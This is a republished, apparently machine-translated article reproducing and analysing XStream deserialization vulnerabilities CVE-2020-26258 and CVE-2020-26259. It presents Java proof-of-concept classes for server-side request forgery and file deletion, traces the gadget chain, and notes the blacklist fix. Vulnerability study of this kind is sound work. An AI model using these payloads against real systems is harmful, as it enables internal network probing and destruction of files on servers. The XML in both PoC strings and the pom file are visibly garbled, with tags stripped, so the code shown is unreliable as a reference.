Shulou(Shulou.com)05/31 Report--

It is believed that many inexperienced people have no idea about the reproduction and analysis of XStream deserialization vulnerabilities CVE-2020-26258 and 26259. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Xstream is a Java class library that is used to serialize objects into XML (JSON) or deserialize them. XStream is open source software that allows distribution under the BSD license.

0x01 vulnerability description

Xstream did not deal completely with CVE-2020-26217 last time. Although it prevents remote code execution by blacklisting, it can still use similar ideas to delete files and forge server requests.

Affect the version

Xstream

= 1.4.15

Risk level

Serious

The PoC of 0x02 PoCCVE-2020-26258 is as follows: import com.thoughtworks.xstream.XStream / * CVE-2020-26258: a Server-Side Forgery Request can be activated unmarshallingwith XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.All versions until and including version 1.4.14 https://x-stream.github.io/CVE-2020-26258.htmlSecurity framework of XStream not explicitly initialized Using predefined black list on your own risk.*/public class CVE_2020_26258 {public static void main (String [] args) {String ssrf_xml = "\ n" + "\ n" + "http://localhost:8989/internal/:\n" +"\ n "+"\ n "+"\ n "+" 0\ n "+"\ n "+"\ n "+" test\ n "+"\ n "+"\ n "+" XStream xstream = new XStream (); xstream.fromXML (ssrf_xml);}} CVE-2020-26259 PoC is as follows: import com.thoughtworks.xstream.XStream / * CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local hostwhen unmarshalling as long as the executing process has sufficient rights. https://x-stream.github.io/CVE-2020-26259.htmlSecurity framework of XStream not explicitly initialized Using predefined black list on your own risk.*/public class CVE_2020_26259 {public static void main (String [] args) {String xml_poc = "\ n" + "\ n" + "\ n" + "0\ n" + "\ n" + "\ n" + "text/plain\ n" + "\ n" + "\ n" + / tmp/CVE-2020-26259 "+"\ n "+"\ n "+" 0\ n "+"\ n "+"\ n "+" test\ n "+"\ n "+"\ n "+" XStream xstream = new XStream (); xstream.fromXML (xml_poc);}} 0x03 vulnerability details reproduce process environment

Idea to build a maven project. Use the above PoC,pom file as follows:

4.0.0111.0-SNAPSHOTcom.thoughtworks.xstreamxstream1.4.14

Just run it directly.

Reappearance

CVE-2020-26258

Open a temporary service using flask

Run PoC to receive the request

CVE-2020-26259

Before running PoC:

After running PoC:

Loophole analysis

These two vulnerabilities are basically similar to the last CVE-2020-26217, mainly using Xstream to check for the existence of entry when deserializing map objects: if so, the hashCode function of entry is called during the construction of this entry. Both CVE-2020-26217 and this one use jdk.nashorn.internal.objects.NativeString 's hashCode function.

Debugging and analysis

Deserialize using xstream's fromXml:

Follow up to putCurrentEntryIntoMap, and in the process of building entry by Xstream, transfer the key value, that is, NativeString, put, provided by us, to map:

The put process performs one-step hash operation:

In hash, we call the hashCode function of key, that is, the hashCode function of jdk.nashorn.internal.objects.NativeString that we entered.

The hashCode function of NativeString calls getStringValue, which in turn calls the toString function of its value, and this value is the com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data we provide.

Base64Data's toString calls its get.

So far, these two vulnerabilities are consistent with CVE-2020-26217. CVE-2020-26217 leverages readFrom and its successors, but because the Xstream blacklist restricts remote code execution, getInputStream and close are used here for ssrf and file deletion.

InputStream is = this.dataHandler.getDataSource () .getInputStream (); is where the ssrf is triggered, using the getInputStream function of javax.activation.URLDataSource:

The getInputStream function of URLDataSource is to access the incoming url.

File deletion is done in ReadAllStream's close.

Repair analysis

Add a blacklist.

After reading the above, have you mastered the method of reproduction and analysis of XStream deserialization vulnerabilities CVE-2020-26258 and 26259? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.